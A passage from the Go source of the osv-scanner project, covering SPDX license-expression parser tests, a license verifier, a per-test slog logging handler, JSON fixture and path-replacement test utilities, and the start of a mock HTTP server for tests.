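		{"A ) B", "unexpected ) after end of expression"},
		{"A WITH B C", "unexpected C after end of expression"},

		// brackets must be paired
		{"(A AND B", "missing closing bracket"},
		{"(((A AND B))", "missing closing bracket"},
		{"(A AND B OR (A AND C)", "missing closing bracket"},

		// "WITH" must only be followed by a license expression
		{"A WITH(", "unexpected ( after WITH"},
		{"A WITH (", "unexpected ( after WITH"},
		{"A WITH WITH", "unexpected WITH after WITH"}, //nolint:dupword
		{"A WITH AND", "unexpected AND after WITH"},
		{"A WITH OR", "unexpected OR after WITH"},
		{"A WITH)", "unexpected ) after WITH"},
		{"A WITH )", "unexpected ) after WITH"},
		{"A WITH", "unexpected END after WITH"},
		{"A WITH ", "unexpected END after WITH"},

		// "AND" must only be followed by a license expression or "("
		{"A AND WITH", "unexpected WITH after AND"},
		{"A AND AND", "unexpected AND after AND"}, //nolint:dupword
		{"A AND OR", "unexpected OR after AND"},
		{"A AND )", "unexpected ) after AND"},
		{"A AND)", "unexpected ) after AND"},
		{"A AND", "unexpected END after AND"},
		{"A AND ", "unexpected END after AND"},

		// "OR" must only be followed by a license expression or "("
		{"A OR WITH", "unexpected WITH after OR"},
		{"A OR AND", "unexpected AND after OR"},
		{"A OR OR", "unexpected OR after OR"}, //nolint:dupword
		{"A OR )", "unexpected ) after OR"},
		{"A OR)", "unexpected ) after OR"},
		{"A OR", "unexpected END after OR"},
		{"A OR ", "unexpected END after OR"},

		// "(" must only be followed by a license expression or "("
		{"(WITH", "unexpected WITH after ("},
		{"( WITH", "unexpected WITH after ("},
		{"(AND", "unexpected AND after ("},
		{"( AND", "unexpected AND after ("},
		{"(OR", "unexpected OR after ("},
		{"( OR", "unexpected OR after ("},
		{"()", "unexpected ) after ("},
		{"( )", "unexpected ) after ("},
		{"(", "unexpected END after ("},
		{"( ", "unexpected END after ("},

		// ")" must only be followed by ")", "AND", "OR", or nothing
		{"(A)(", "unexpected ( after )"},
		{"(A) (", "unexpected ( after )"},
		{"( A ) (", "unexpected ( after )"},
		{"(A)Apache-2.0", "unexpected EXP after )"},
		{"(A)MIT", "unexpected EXP after )"},
		{"(A) MIT", "unexpected EXP after )"},
		{"( A ) MIT", "unexpected EXP after )"},
		{"(A)WITH", "unexpected WITH after )"},
		{"(A) WITH", "unexpected WITH after )"},
		{"( A ) WITH", "unexpected WITH after )"},

		// a license expression must only be followed by "WITH", "AND", "OR", ")", or nothing
		{"MIT (", "unexpected ( after EXP"},
		{"MIT(", "unexpected ( after EXP"},
		{"Apache2.0(", "unexpected ( after EXP"},
		{"MIT Apache2.0", "unexpected EXP after EXP"},

		// nested errors
		{"A AND (OR", "unexpected OR after ("},
		{"A OR (AND", "unexpected AND after ("},
		{"A OR AND (()", "unexpected AND after OR"},
		{"A OR (()", "unexpected ) after ("},
		{"A OR (B AND A OR (OR)", "unexpected OR after ("},
	}
	for _, tt := range tests {
		t.Run(string(tt.license), func(t *testing.T) {
			t.Parallel()

			got, err := spdx.Satisfies(tt.license, []string{})

			if got {
				t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, got, false)
			}

			if err == nil {
				t.Fatalf("Satisfies(\"%s\") = %v, want %v", tt.license, err, tt.wantErr)
			}

			if !strings.Contains(err.Error(), tt.wantErr) {
				t.Errorf("Satisfies(\"%s\") = %v, want %v", tt.license, err, tt.wantErr)
			}
		})
	}
}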
================================================
FILE: internal/spdx/verify.go
================================================
package spdx

import "strings"

// Unrecognized returns the entries of licenses whose lower-cased form is
// neither marked in IDs nor equal to "unknown", in their original spelling
// and order. The result is nil when every entry is recognized.
func Unrecognized(licenses []string) (unrecognized []string) {
	for _, candidate := range licenses {
		lowered := strings.ToLower(candidate)

		// "unknown" is accepted alongside the identifiers listed in IDs
		if lowered == "unknown" || IDs[lowered] {
			continue
		}

		unrecognized = append(unrecognized, candidate)
	}

	return unrecognized
}

================================================
FILE: internal/spdx/verify_test.go
================================================
package spdx_test

import (
	"reflect"
	"testing"

	"github.com/google/osv-scanner/v2/internal/spdx"
)

// TestUnrecognized checks which licenses are reported back, including that
// matching ignores case and that nil is returned when nothing is unrecognized
func TestUnrecognized(t *testing.T) {
	t.Parallel()

	cases := []struct {
		name     string
		licenses []string
		want     []string
	}{
		{
			name:     "all_recognized_licenses",
			licenses: []string{"agpl-1.0", "MIT", "apache-1.0", "UNKNOWN"},
			want:     nil,
		},
		{
			name:     "all_unrecognized_licenses",
			licenses: []string{"agpl1.0", "unrecognized license", "apache1.0"},
			want:     []string{"agpl1.0", "unrecognized license", "apache1.0"},
		},
		{
			name:     "some_recognized,_some_unrecognized_licenses",
			licenses: []string{"agpl-1.0", "unrecognized license", "apache-1.0"},
			want:     []string{"unrecognized license"},
		},
	}

	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			t.Parallel()

			got := spdx.Unrecognized(tc.licenses)

			if !reflect.DeepEqual(got, tc.want) {
				t.Errorf("Unrecognized() = %v,\nwant %v", got, tc.want)
			}
		})
	}
}

================================================
FILE: internal/testlogger/handler.go
================================================
// Package testlogger provides a slog handler which can handle t.Parallel() tests while being a global logging handler,
// redirecting it to the correct underlying logger for each test thread.
//
// This package also muffles certain log messages to reduce noise in the snapshots
// and to keep the snapshots consistent across runs.
package testlogger

import (
	"bufio"
	"bytes"
	"context"
	"log/slog"
	"os"
	"runtime/debug"
	"strings"
	"sync"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
)

// stdLogger is the logger used when no test instance can be found for the caller.
// NOTE(review): the first argument is os.Stdin rather than an output stream;
// confirm against cmdlogger.New that this is intended.
var stdLogger = cmdlogger.New(os.Stdin, os.Stdout)

// Handler can be installed as the global logging handler before tests start;
// each test case then registers its own cmdlogger.CmdLogger with AddInstance.
type Handler struct {
	loggerMap sync.Map // map[string]cmdlogger.CmdLogger
}

// getLogger returns the logger registered for the calling test, or stdLogger
// when the caller cannot be tied to a test. It panics if the caller belongs to
// a test that has not registered a logger.
func (tl *Handler) getLogger() cmdlogger.CmdLogger {
	instance := getCallerInstance()

	if instance != "" {
		registered, found := tl.loggerMap.Load(instance)
		if !found {
			panic("logger not found: " + instance)
		}

		return registered.(cmdlogger.CmdLogger)
	}

	return stdLogger
}

// AddInstance registers logger as the "global" logger of the calling test run.
func (tl *Handler) AddInstance(logger cmdlogger.CmdLogger) {
	instance := getCallerInstance()

	previous, _ := tl.loggerMap.Swap(instance, logger)
	if previous == nil {
		return
	}

	// Guards against incorrect usage of the Handler; this should never trigger
	// in real tests as long as Delete() is called at the end of each of them.
	panic("same logger being added twice")
}

// Delete removes the logger registered by AddInstance()
// It **must** be called before a test ends, as the same memory address may be reused.
func (tl *Handler) Delete() {
	instance := getCallerInstance()

	tl.loggerMap.Delete(instance)
}

// SendEverythingToStderr tells the logger to send all logs to stderr regardless
// of their level.
//
// This is useful if we're expecting to output structured data to stdout such
// as JSON, which cannot be mixed with other output.
func (tl *Handler) SendEverythingToStderr() {
	logger := tl.getLogger()
	logger.SendEverythingToStderr()
}

// SetLevel passes the level on to the logger of the calling test.
func (tl *Handler) SetLevel(level slog.Leveler) {
	logger := tl.getLogger()
	logger.SetLevel(level)
}

// Enabled asks the logger of the calling test whether the level is enabled.
func (tl *Handler) Enabled(ctx context.Context, level slog.Level) bool {
	logger := tl.getLogger()

	return logger.Enabled(ctx, level)
}

// Handle drops records whose message starts with one of the muffled prefixes,
// and passes every other record on to the logger of the calling test.
//
// It panics if such a record would end up at stdLogger, which happens when the
// caller cannot be tied to a test.
func (tl *Handler) Handle(ctx context.Context, record slog.Record) error {
	muffledPrefixes := []string{
		"Starting filesystem walk for root:",
		"End status: ",
		"Neither CPE nor PURL found for package",
		"Invalid PURL",
		"os-release[ID] not set, fallback to",
		// TODO(another-rex): We should allow overriding of these values to avoid this issue.
		"VERSION_ID not set in os-release",
		"VERSION_CODENAME and VERSION_ID not set in os-release",
		"VERSION_CODENAME not set in os-release, fallback to VERSION_ID",
		"osrelease.ParseOsRelease(): file does not exist",
		"Status: new inodes:",
		"Created image content file:",
		"interpreting as regex/glob and not absolute path",
	}

	for i := range muffledPrefixes {
		if strings.HasPrefix(record.Message, muffledPrefixes[i]) {
			return nil
		}
	}

	logger := tl.getLogger()

	if logger != stdLogger {
		return logger.Handle(ctx, record)
	}

	// There are currently no non-muffled logs coming from goroutines; failing
	// loudly here makes sure a new one is noticed and gets an exception added.
	panic("noop logger found when logging non-muffled messages")
}

// SetHasErrored passes the call on to the logger of the calling test.
func (tl *Handler) SetHasErrored() {
	logger := tl.getLogger()
	logger.SetHasErrored()
}

// HasErrored returns true if there have been any calls to Handle with
// a level of [slog.LevelError]
func (tl *Handler) HasErrored() bool {
	logger := tl.getLogger()

	return logger.HasErrored()
}

// HasErroredBecauseInvalidConfig returns true if there have been any calls to
// Handle with a level of [slog.LevelError] due to a config file being invalid
func (tl *Handler) HasErroredBecauseInvalidConfig() bool {
	logger := tl.getLogger()

	return logger.HasErroredBecauseInvalidConfig()
}

// WithAttrs returns the result of WithAttrs on the logger of the calling test.
func (tl *Handler) WithAttrs(attrs []slog.Attr) slog.Handler {
	logger := tl.getLogger()

	return logger.WithAttrs(attrs)
}

// WithGroup returns the result of WithGroup on the logger of the calling test.
func (tl *Handler) WithGroup(g string) slog.Handler {
	logger := tl.getLogger()

	return logger.WithGroup(g)
}

var _ cmdlogger.CmdLogger = &Handler{}

// New returns a Handler that has no loggers registered yet.
func New() *Handler {
	handler := new(Handler)

	return handler
}

// getCallerInstance finds in the call stack the memory address of the initial test runner call.
// It will look something like this:
//
//	`testing.tRunner(0x12345678, 0x98765432)`
//
// This is safe to be used as a key, as the first pointer address must be unique
// while this test is running, and will only be reused after the test exits and that address is garbage collected.
//
// This uses debug.Stack(), which will create a buffer big enough to fit the entire stack trace.
// If there is deep recursion, this will have a significant performance cost.
//
// Caveat: This cannot get the stack trace if called from a goroutine, and will return ""
func getCallerInstance() string {
	trace := debug.Stack()
	lines := bufio.NewScanner(bytes.NewReader(trace))

	for lines.Scan() {
		line := lines.Text()

		// the test runner frame identifies the test this call belongs to
		if strings.HasPrefix(line, "testing.tRunner(") {
			return line
		}

		// reaching the line that says where the goroutine was created means
		// no test runner frame was found above it
		if strings.HasPrefix(line, "created by ") && strings.Contains(line, " in goroutine ") {
			return ""
		}
	}

	return ""
}

================================================
FILE: internal/testlogger/markers.go
================================================
package testlogger

import (
	"testing"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
)

const BeginDirectoryScan = "---Begin Directory Scan---"
const EndDirectoryScan = "---End Directory Scan---"

// BeginDirScanMarker logs the marker for the start of a directory scan, which
// lets snapshots sort the scanning order to allow for unsorted file walks.
// Nothing is logged outside of tests.
func BeginDirScanMarker() {
	if !testing.Testing() {
		return
	}

	cmdlogger.Infof(BeginDirectoryScan)
}

// EndDirScanMarker logs the marker for the end of a directory walk.
// Nothing is logged outside of tests.
func EndDirScanMarker() {
	if !testing.Testing() {
		return
	}

	cmdlogger.Infof(EndDirectoryScan)
}

================================================
FILE: internal/testutility/fixture.go
================================================
// Package testutility provides utility functions for tests.
package testutility

import (
	"encoding/json"
	"os"
	"testing"

	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"google.golang.org/protobuf/encoding/protojson"
)

// load reads the fixture file at path and returns its contents after passing
// them through applyWindowsReplacements. The test is failed if the file cannot
// be read.
func load(t *testing.T, path string, windowsReplacements map[string]string) []byte {
	t.Helper()

	contents, err := os.ReadFile(path)
	if err != nil {
		t.Fatalf("Failed to open fixture: %s", err)
	}

	replaced := applyWindowsReplacements(string(contents), windowsReplacements)

	return []byte(replaced)
}

// LoadJSONFixture returns the contents of the fixture file parsed as JSON,
// without any replacements
func LoadJSONFixture[V any](t *testing.T, path string) V {
	t.Helper()

	noReplacements := map[string]string{}

	return LoadJSONFixtureWithWindowsReplacements[V](t, path, noReplacements)
}

// LoadJSONFixtureWithWindowsReplacements returns the contents of the fixture
// file parsed as JSON after applying any replacements if running on Windows.
// The test is failed if the contents cannot be unmarshalled into V.
func LoadJSONFixtureWithWindowsReplacements[V any](
	t *testing.T,
	path string,
	replacements map[string]string,
) V {
	t.Helper()

	var parsed V

	if err := json.Unmarshal(load(t, path, replacements), &parsed); err != nil {
		t.Fatalf("Failed to unmarshal val: %s", err)
	}

	return parsed
}

// LoadVulnMapFixture returns the contents of the fixture file parsed as a map
// of vulnerability IDs to vulnerabilities. The file is first split into one raw
// JSON message per ID, and each message is then decoded with protojson.
func LoadVulnMapFixture(t *testing.T, path string) map[string]*osvschema.Vulnerability {
	t.Helper()

	var rawByID map[string]json.RawMessage

	if err := json.Unmarshal(load(t, path, map[string]string{}), &rawByID); err != nil {
		t.Fatalf("Failed to unmarshal val: %s", err)
	}

	vulns := make(map[string]*osvschema.Vulnerability)

	for id, rawVuln := range rawByID {
		decoded := &osvschema.Vulnerability{}

		if err := protojson.Unmarshal(rawVuln, decoded); err != nil {
			t.Fatalf("Failed to unmarshal vuln %s: %s", id, err)
		}

		vulns[id] = decoded
	}

	return vulns
}

================================================
FILE: internal/testutility/jsonreplace.go
================================================ package testutility import ( "strconv" "strings" "testing" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/tidwall/gjson" "github.com/tidwall/sjson" ) type JSONReplaceRule struct { Path string ReplaceFunc func(toReplace gjson.Result) any } var ( // OnlyIDVulnsRule simplifies vulnerabilities to only their ID OnlyIDVulnsRule = JSONReplaceRule{ Path: "results.#.packages.#.vulnerabilities", ReplaceFunc: func(toReplace gjson.Result) any { return toReplace.Get("#.id").Value() }, } // GroupsAsArrayLen replaces the groups array with its length GroupsAsArrayLen = JSONReplaceRule{ Path: "results.#.packages.#.groups", ReplaceFunc: func(toReplace gjson.Result) any { if toReplace.IsArray() { return len(toReplace.Array()) } return 0 }, } // OnlyFirstBaseImage simplifies the array of base images to only the first one OnlyFirstBaseImage = JSONReplaceRule{ Path: "image_metadata.base_images.#", ReplaceFunc: func(toReplace gjson.Result) any { if toReplace.IsArray() && len(toReplace.Array()) >= 1 { return toReplace.Array()[0].Value() } return struct{}{} }, } // AnyDiffID truncates diff ids in image layer metadata to just `sha256:...` AnyDiffID = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.diff_id", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 7 { return toReplace.String()[:7] + "..." } return "" }, } // ShortenHistoryCommandLength truncates COMMAND data to 28 characters ShortenHistoryCommandLength = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.command", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 28 { return toReplace.String()[:25] + "..." 
} return toReplace.String() }, } // NormalizeHistoryCommand replaces COMMAND data to be consistent // across different versions of docker NormalizeHistoryCommand = JSONReplaceRule{ Path: "image_metadata.layer_metadata.#.command", ReplaceFunc: func(toReplace gjson.Result) any { str := toReplace.String() nopMatcher := cachedregexp.MustCompile(`^/bin/sh -c #\(nop\)\s+`) runMatcher := cachedregexp.MustCompile(`^/bin/sh -c\s+`) str = nopMatcher.ReplaceAllLiteralString(str, "") str = runMatcher.ReplaceAllString(str, "RUN \\0") return str }, } // NormalizeCreateDateSPDX replaces the created date with a placeholder date NormalizeCreateDateSPDX = JSONReplaceRule{ Path: "creationInfo.created", ReplaceFunc: func(_ gjson.Result) any { return "2025-01-01T01:01:01Z" }, } ReplacePartialFingerprintHash = JSONReplaceRule{ Path: "runs.#.results.#.partialFingerprints.primaryLocationLineHash", ReplaceFunc: func(toReplace gjson.Result) any { if len(toReplace.String()) > 0 { return "[line-hash]" } return "[empty]" }, } ) func expandArrayPaths(t *testing.T, jsonInput string, path string) []string { t.Helper() // split on the first intermediate #, if present pathToArray, restOfPath, hasArrayPlaceholder := strings.Cut(path, ".#.") // if there is no intermediate placeholder, check for (and cut) a terminal one if !hasArrayPlaceholder { pathToArray, hasArrayPlaceholder = strings.CutSuffix(path, ".#") } // if there are no array placeholders in the path, just return it if !hasArrayPlaceholder { return []string{path} } r := gjson.Get(jsonInput, pathToArray) // skip properties that are not arrays if !r.IsArray() { return []string{} } // if property exists and is actually an array, build out the path to each item // within that array paths := make([]string, 0, len(r.Array())) for i := range r.Array() { static := pathToArray + "." + strconv.Itoa(i) if restOfPath != "" { static += "." + restOfPath } paths = append(paths, expandArrayPaths(t, jsonInput, static)...) 
} return paths } // ReplaceJSONInput takes a gjson path and replaces all elements the path matches with the output of matcher func ReplaceJSONInput(t *testing.T, jsonInput string, path string, replacer func(toReplace gjson.Result) any) string { t.Helper() var err error json := jsonInput for _, pathElem := range expandArrayPaths(t, jsonInput, path) { res := gjson.Get(jsonInput, pathElem) if !res.Exists() { continue } // optimistically replace the element, since we know at this point it does exist json, err = sjson.SetOptions(json, pathElem, replacer(res), &sjson.Options{Optimistic: true}) if err != nil { t.Fatalf("failed to set element") } } return json } ================================================ FILE: internal/testutility/jsonreplace_test.go ================================================ package testutility import ( "bytes" "encoding/json" "fmt" "maps" "slices" "testing" "github.com/google/go-cmp/cmp" "github.com/tidwall/gjson" ) func Test_replaceJSONInput(t *testing.T) { t.Parallel() matcher := func(_ gjson.Result) any { return "" } tests := []struct { input string outputs map[string]string }{ { input: `{}`, outputs: map[string]string{"": `{}`, "arr.#": `{}`}, }, { input: `{ "foo": "bar" }`, outputs: map[string]string{ "does.not.exist": `{ "foo": "bar" }`, "foo.is.string": `{ "foo": "bar" }`, "foo.#": `{ "foo": "bar" }`, "#": `{ "foo": "bar" }`, "foo": `{ "foo": "" }`, }, }, { input: `{ "foo": { "inner": "bar" } }`, outputs: map[string]string{ "foo.inner": `{ "foo": { "inner": "" } }`, }, }, { input: `{ "arr": [1, 2, 3] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.1": `{ "arr": [1, "", 3] }`, "arr.#": `{ "arr": ["", "", ""] }`, "arr.#(>2)": `{ "arr": [1, 2, ""] }`, "arr.#(>1)": `{ "arr": [1, "", 3] }`, "arr.#(>1)#": `{ "arr": [1, "", ""] }`, }, }, { input: `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.0.v": `{ "arr": [{"v": ""}, {"v": 2}, {"v": 3}] }`, "arr.1.v": `{ "arr": [{"v": 1}, 
{"v": ""}, {"v": 3}] }`, "arr.#": `{ "arr": ["", "", ""] }`, "arr.#.v": `{ "arr": [{"v": ""}, {"v": ""}, {"v": ""}] }`, "arr.#.v.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, "arr.#.#.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, "arr.#.#": `{ "arr": [{"v": 1}, {"v": 2}, {"v": 3}] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, outputs: map[string]string{ "arr": `{ "arr": "" }`, "arr.0.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.1.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.1.v.2.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.#": `{ "arr": [ "", "", "" ] }`, "arr.1.v.#": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": ["", ""] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, "arr.#.v.#": `{ "arr": [ { "v": ["", ""] }, { "v": ["", ""] }, { "v": ["", ""] } ] }`, "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": ""}, {"v": 4}] }, { "v": [{"v": ""}, {"v": 6}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, { "v": [{"v": 3}, {"v": ""}] }, { "v": [{"v": 5}, {"v": ""}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": 3}, {"v": 4}] }, { "v": [{"v": 5}, {"v": 6}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, { "v": [{"v": ""}, {"v": 4}] }, { "v": [{"v": ""}, {"v": 6}] }, { "v": [{"v": ""}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, { "v": [{"v": 3}, 
{"v": ""}] }, { "v": [{"v": 5}, {"v": ""}] }, { "v": [{"v": 7}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, { "v": [{"v": ""}, {"v": ""}] }, { "v": [{"v": 5}, {"v": 6}] }, { "v": [{"v": 7}] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.0.v": `{ "arr": [ { "v": [{"v": ""}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, "arr.#.v.1.v": `{ "arr": [ { "v": [{"v": 1}, {"v": ""}] }, {}, { "v": [{"v": 5}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, "arr.#.v.#.v": `{ "arr": [ { "v": [{"v": ""}, {"v": ""}] }, {}, { "v": [{"v": ""}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, "arr.1.v.#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, "arr.#": `{ "arr": [ "", "", "", "", "", "", "" ] }`, "arr.#.v": `{ "arr": [ { "v": "" }, {}, { "v": "" }, { "foo": "bar" }, { "v": "" }, { "v": "" }, { "v": "" } ] }`, "arr.#.v.#": `{ "arr": [ { "v": ["", ""] }, {}, { "v": ["", ""] }, { "foo": "bar" }, { "v": [] }, { "v": [""] }, { "v": [""] } ] }`, }, }, { input: `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": 5}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": 7}] } ] }`, outputs: map[string]string{ "arr.#.v.#(v>=3).v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": 6}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, 
"arr.#.v.#(v>=3)#": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": ["", ""] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [""] } ] }`, "arr.#.v.#(v>=3)#.v": `{ "arr": [ { "v": [{"v": 1}, {"v": 2}] }, {}, { "v": [{"v": ""}, {"v": ""}] }, { "foo": "bar" }, { "v": [] }, { "v": [{"foo": "bar"}] }, { "v": [{"v": ""}] } ] }`, }, }, { input: `{ "results": [ {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2024-02-16T08:21:35.601880Z" } ] }, {}, {}, {} ] }`, outputs: map[string]string{ "results.#.vulns.#.modified": `{ "results": [ {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "" } ] }, {}, {}, {} ] }`, }, }, } for i, tt := range tests { paths := slices.AppendSeq(make([]string, 0, len(tt.outputs)), maps.Keys(tt.outputs)) slices.Sort(paths) for _, path := range paths { t.Run(fmt.Sprintf("%d-%s", i, path), func(t *testing.T) { t.Parallel() got := ReplaceJSONInput(t, tt.input, path, matcher) if !gjson.Valid(got) { t.Fatalf("Output not valid: \n%s", got) } if !gjson.Valid(tt.outputs[path]) { t.Fatalf("Want field is not valid JSON: \n%s", tt.outputs[path]) } var wantPretty bytes.Buffer var gotPretty bytes.Buffer _ = json.Indent(&wantPretty, []byte(tt.outputs[path]), "", " ") _ = json.Indent(&gotPretty, []byte(got), "", " ") if diff := cmp.Diff(wantPretty.String(), gotPretty.String()); diff != "" { t.Errorf("ReplaceJSONInput() diff (-want +got): %s", diff) } }) } } } func Test_replaceJSONInput_More(t *testing.T) { t.Parallel() // A nested JSON structure with arrays nestedArray := `{ "items": [ { "subStruct": { "subitems": [ { "anotherSubStruct": "original value 1" }, { "anotherSubStruct": "original value 2" } ] } }, { "subStruct": { "subitems": [ { "anotherSubStruct": "original value 3" }, { "anotherSubStruct": "original value 4" } ] } } ] }` // A simple JSON structure simpleStruct := `{ "test": { "field": "original value" } }` type args struct { jsonInput string path string matcher func(toReplace gjson.Result) any } tests := 
[]struct { name string args args want string }{ { name: "Nested_json_replacement", args: args{ jsonInput: nestedArray, path: "items.#.subStruct.subitems.#.anotherSubStruct", matcher: func(_ gjson.Result) any { return "" }, }, want: `{ "items": [ { "subStruct": { "subitems": [ { "anotherSubStruct": "" }, { "anotherSubStruct": "" } ] } }, { "subStruct": { "subitems": [ { "anotherSubStruct": "" }, { "anotherSubStruct": "" } ] } } ] }`, }, { name: "simple_json_replacement", args: args{ jsonInput: simpleStruct, path: "test.field", matcher: func(_ gjson.Result) any { return "" }, }, want: `{ "test": { "field": "" } }`, }, { name: "nested_json_array_element_replacement", args: args{ jsonInput: nestedArray, path: "items.#.subStruct.subitems.#", matcher: func(res gjson.Result) any { return res.Get("anotherSubStruct").Value() }, }, want: `{ "items": [ { "subStruct": { "subitems": [ "original value 1", "original value 2" ] } }, { "subStruct": { "subitems": [ "original value 3", "original value 4" ] } } ] }`, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got := ReplaceJSONInput(t, tt.args.jsonInput, tt.args.path, tt.args.matcher) if !gjson.Valid(got) { t.Fatalf("Output not valid: \n%s", got) } if !gjson.Valid(tt.want) { t.Fatalf("Want field is not valid JSON: \n%s", tt.want) } var wantPretty bytes.Buffer var gotPretty bytes.Buffer _ = json.Indent(&wantPretty, []byte(tt.want), "", "\t") _ = json.Indent(&gotPretty, []byte(got), "", "\t") if diff := cmp.Diff(wantPretty.String(), gotPretty.String()); diff != "" { t.Errorf("ReplaceJSONInput() diff (-want +got): %s", diff) } }) } } ================================================ FILE: internal/testutility/mock_http.go ================================================ package testutility import ( "log" "net/http" "net/http/httptest" "os" "strings" "sync" "testing" ) type MockHTTPServer struct { *httptest.Server mu sync.Mutex response map[string][]byte // path -> response authorization string // 
expected Authorization header contents
}

// NewMockHTTPServer creates and starts a minimal HTTP server for mocking basic requests.
// The server is shut down with Close() from the test's Cleanup hook.
//
// Responses for specific URL paths are registered with SetResponse / SetResponseFromFile.
func NewMockHTTPServer(t *testing.T) *MockHTTPServer {
	t.Helper()

	srv := &MockHTTPServer{response: map[string][]byte{}}
	// The mock is its own http.Handler (see ServeHTTP).
	srv.Server = httptest.NewServer(srv)
	t.Cleanup(func() {
		srv.Close()
	})

	return srv
}

// SetResponse registers the bytes the server returns for the given URL path.
// A leading "/" on path is dropped before the path is used as the lookup key.
func (m *MockHTTPServer) SetResponse(t *testing.T, path string, response []byte) {
	t.Helper()

	key := strings.TrimPrefix(path, "/")

	m.mu.Lock()
	defer m.mu.Unlock()
	m.response[key] = response
}

// SetResponseFromFile registers the contents of the file at filename as the
// server's response for the given URL path. The test fails immediately if the
// file cannot be read.
func (m *MockHTTPServer) SetResponseFromFile(t *testing.T, path string, filename string) {
	t.Helper()

	contents, readErr := os.ReadFile(filename)
	if readErr != nil {
		t.Fatalf("failed to read response file: %v", readErr)
	}

	m.SetResponse(t, path, contents)
}

// SetAuthorization sets the contents of the 'Authorization' header the server expects for all endpoints.
//
// An incoming request's header must match the auth string exactly, otherwise the server responds with 401 Unauthorized.
// If authorization is unset or empty, the server does not require authorization.
func (m *MockHTTPServer) SetAuthorization(t *testing.T, auth string) {
	t.Helper()

	m.mu.Lock()
	defer m.mu.Unlock()
	m.authorization = auth
}

// ServeHTTP is the http.Handler for the underlying httptest.Server.
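func (m *MockHTTPServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	// Copy what we need under the lock so that the response is written without
	// holding it.
	m.mu.Lock()
	wantAuth := m.authorization
	resp, ok := m.response[strings.TrimPrefix(r.URL.EscapedPath(), "/")]
	m.mu.Unlock()

	// The expected header is compared with a plain string comparison. That is
	// sufficient for a test double; it is not a constant-time check and this
	// handler is not a model for authenticating real requests.
	if wantAuth != "" && r.Header.Get("Authorization") != wantAuth {
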